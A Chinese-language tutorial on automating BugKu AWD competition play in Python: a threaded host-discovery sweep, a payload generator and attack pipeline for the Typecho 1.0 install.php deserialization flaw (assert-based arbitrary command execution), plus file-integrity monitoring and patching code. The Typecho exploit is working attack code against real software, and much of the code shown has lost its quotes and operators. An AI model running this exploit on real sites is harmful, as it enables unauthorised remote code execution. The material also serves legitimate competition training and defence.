告别“脚本小子”在BugKu AWD中如何用Python多线程快速定位存活靶机与自动化攻击在网络安全竞赛的AWDAttack With Defense模式中时间就是分数。当传统的手工操作遇上分秒必争的比赛节奏自动化工具便成为制胜关键。本文将带你从Python基础脚本出发逐步构建一套完整的自动化攻防体系涵盖靶机探测、漏洞利用和flag自动化提交全流程。1. 靶机存活探测从单线程到工业级扫描1.1 基础探测脚本的瓶颈分析初学者常以简单的ping命令循环作为探测起点import os for i in range(1, 255): ip f192.168.1.{i} response os.system(fping -c 1 {ip}) if response 0: print(f[] {ip} is alive)这种线性扫描存在三个致命缺陷耗时严重按每次ping耗时1秒计算完整扫描需4分钟以上缺乏异常处理网络波动会导致误判结果可读性差输出信息缺乏结构化1.2 多线程改造方案对比方案优点缺点适用场景threading内置库无需安装需手动管理线程池简单并发任务multiprocessing避免GIL限制进程开销大CPU密集型任务concurrent.futures接口统一易用需Python 3.2I/O密集型任务推荐使用ThreadPoolExecutor的线程池实现from concurrent.futures import ThreadPoolExecutor import pythonping def check_host(ip): try: response pythonping.ping(ip, count1, timeout1) if response.success(): return ip except Exception: pass return None def scan_network(base_ip192.168.1, workers100): ips [f{base_ip}.{i} for i in range(1, 255)] alive_ips [] with ThreadPoolExecutor(max_workersworkers) as executor: results executor.map(check_host, ips) for ip in filter(None, results): alive_ips.append(ip) print(f[] Active host: {ip}) return alive_ips关键优化点超时控制设置1秒超时避免僵死线程异常捕获处理网络波动导致的异常结果过滤使用filter自动筛除None结果2. 漏洞自动化利用以Typecho 1.0反序列化为例2.1 漏洞原理快速解析Typecho 1.0的反序列化漏洞核心在于未对用户输入的序列化数据进行过滤通过__wakeup或__destruct魔术方法触发危险操作利用PHP的assert函数执行任意代码2.2 Payload生成器开发将原文中的PHP Payload转化为Python生成器import base64 def generate_payload(command): php_code f?php class Typecho_Feed {{ const RSS2 RSS 2.0; private $_type; private $_items; public function __construct() {{ $this-_type self::RSS2; $this-_items[0] [ category [new Typecho_Request()], author new Typecho_Request() ]; }} }} class Typecho_Request {{ private $_params [screenName {command}]; private $_filter [assert]; }} $exp [ adapter new Typecho_Feed(), prefix typecho_ ]; echo base64_encode(serialize($exp)); ? # 使用PHP CLI执行代码 import subprocess process subprocess.run( [php, -r, php_code], capture_outputTrue, textTrue ) return process.stdout.strip()2.3 自动化攻击流水线import requests def exploit_target(url, payload): headers { User-Agent: Mozilla/5.0, Content-Type: application/x-www-form-urlencoded } try: # 检测install.php是否存在 check requests.get(f{url}/install.php, headersheaders, timeout3) if check.status_code ! 200: return False # 发送攻击请求 data {__typecho_config: payload} response requests.post( f{url}/install.php, datadata, headersheaders, timeout5 ) # 验证攻击结果 return File not found not in response.text except Exception: return False3. 防御策略自动化实现3.1 关键文件监控import hashlib from pathlib import Path class FileMonitor: def __init__(self, web_root): self.web_root Path(web_root) self.baseline {} def create_baseline(self): for file in self.web_root.rglob(*): if file.is_file(): self.baseline[str(file)] { size: file.stat().st_size, mtime: file.stat().st_mtime, hash: hashlib.md5(file.read_bytes()).hexdigest() } def check_integrity(self): alerts [] for filepath, original in self.baseline.items(): current Path(filepath) if not current.exists(): alerts.append(f[!] File deleted: {filepath}) continue current_stat { size: current.stat().st_size, mtime: current.stat().st_mtime, hash: hashlib.md5(current.read_bytes()).hexdigest() } if current_stat ! original: alerts.append(f[!] File modified: {filepath}) return alerts3.2 自动化补丁部署def apply_patch(web_root): install_php Path(web_root) / install.php if install_php.exists(): # 备份原文件 install_php.rename(install_php.with_suffix(.php.bak)) # 创建无害化文件 with open(install_php, w) as f: f.write(?php header(HTTP/1.1 403 Forbidden); die(); ?)4. 竞赛实战技巧与异常处理4.1 网络波动应对策略在AWD环境中网络不稳定是常态。建议在关键函数中添加重试机制from tenacity import retry, stop_after_attempt, wait_exponential retry( stopstop_after_attempt(3), waitwait_exponential(multiplier1, min1, max10) ) def robust_request(url, timeout3): try: response requests.get(url, timeouttimeout) response.raise_for_status() return response except requests.exceptions.RequestException as e: print(fRequest failed: {str(e)}) raise4.2 性能优化参数调优根据网络环境调整线程池参数网络条件推荐workers数超时设置重试次数局域网低延迟200-3000.5s1跨机房中延迟100-1501s2高延迟不稳定50-802s34.3 日志记录与分析import logging from logging.handlers import RotatingFileHandler def setup_logging(): logger logging.getLogger(awd_tool) logger.setLevel(logging.DEBUG) handler RotatingFileHandler( awd.log, maxBytes5*1024*1024, backupCount3 ) formatter logging.Formatter( %(asctime)s - %(levelname)s - %(message)s ) handler.setFormatter(formatter) logger.addHandler(handler) return logger在实际比赛中发现合理的线程池大小设置往往比单纯增加线程数更有效。当网络延迟较高时过大的线程池反而会导致整体性能下降。